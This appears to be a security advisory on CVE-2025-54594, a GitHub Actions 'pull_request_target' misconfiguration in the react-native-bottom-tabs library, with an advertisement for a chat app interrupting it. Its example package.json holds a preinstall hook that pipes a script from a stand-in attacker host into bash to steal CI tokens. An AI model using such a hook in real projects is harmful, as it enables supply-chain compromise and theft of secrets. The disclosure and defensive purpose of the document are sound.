Overview
A critical vulnerability has been identified in the react-native-bottom-tabs library, a popular library for creating bottom tabs in React Native applications. This vulnerability, tagged as CVE-2025-54594, potentially exposes systems to compromise or data leakage, affecting developers and end-users of applications leveraging this library. It’s a serious issue that underscores the importance of secure coding practices and vigilant software development life-cycle management.
Vulnerability Summary
CVE ID: CVE-2025-54594
Severity: Critical – 9.1 CVSS score
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System compromise, Data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
react-native-bottom-tabs | 0.9.2 and below
How the Exploit Works
The vulnerability stems from the GitHub Actions repository workflow in the react-native-bottom-tabs library. Specifically, the ‘release-canary.yml’ workflow improperly used the ‘pull_request_target’ event trigger. This misconfiguration allows untrusted code from a forked pull request to be executed in a privileged context.
An attacker can exploit this vulnerability by creating a pull request containing a malicious preinstall script in the ‘package.json’ file. The attacker then triggers the vulnerable workflow by posting a specific comment (‘!canary’). This leads to arbitrary code execution, potentially leading to the exfiltration of sensitive secrets such as GITHUB_TOKEN and NPM_TOKEN. These tokens could allow an attacker to push malicious code to the repository or publish compromised packages to the NPM registry.
Conceptual Example Code
The following conceptual example demonstrates how an attacker might exploit this vulnerability:
// Malicious preinstall script in package.json
{
"name": "exploit",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"preinstall": "curl https://attacker.com/steal_secrets.sh | bash"
},
"author": "",
"license": "ISC"
}Then, the attacker would comment ‘!canary’ on the pull request to trigger the vulnerable workflow.
Mitigation and Remediation
Currently, there is a remediation commit that removes the ‘release-canary.yml’ file, but a version with this fix has yet to be officially released. Until the updated version is available, the recommended mitigation step is to either apply the vendor patch manually or use a Web Application Firewall (WAF) or Intrusion Detection System (IDS) as a temporary measure.
It is also recommended to review the security settings of your GitHub Actions to ensure that untrusted code from forked pull requests cannot be executed in a privileged context.